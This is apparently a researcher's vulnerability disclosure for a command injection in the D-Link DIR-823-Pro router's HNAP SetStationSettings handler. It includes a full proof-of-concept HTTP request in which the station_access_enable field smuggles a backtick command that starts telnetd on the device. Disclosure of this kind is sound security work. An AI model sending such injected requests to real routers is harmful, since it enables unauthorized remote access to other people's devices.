# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `SetStationSettings` function, `station_access_enable` is directly passed by the attacker, so we can control the `station_access_enable` to attack the OS.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

<div  align="center"><img src="./images/2.png" style="zoom:60%;" /></div>

As you can see here, in `sub_402D74` function, the initial input has not checked and cause command injection.

<div  align="center"><img src="./images/3.png" style="zoom:60%;" /></div>

**Supplement**

We also observed that this vulnerability may also affect covr-1202 and recently released products such as DIR-1260, etc., and the impact is wider.、



## PoC

We set `station_access_enable` as **`/usr/sbin/telnetd`** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetStationSettings"
HNAP_AUTH: CD14A8FE84714DC0BA4859226E9D2F79 1642485258474
Content-Length: 135
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/Devices.html
Cookie: work_mode=router; uid=ozxH3H%2F2; PrivateKey=995339D3AF92F525E305916030B7DAC7; timeout=6

{"SetStationSettings":{"station_mac":"5e:5d:10:37:cf:82","station_ext_name":"OnePlus-8","station_access_enable":"`/usr/sbin/telnetd`"}}
```

<div  align="center"><img src="./images/4.png" style="zoom:80%;" /></div>



## Result

The target router has enabled the telnet service.

<div  align="center"><img src="./images/5.png" style="zoom:80%;" /></div>
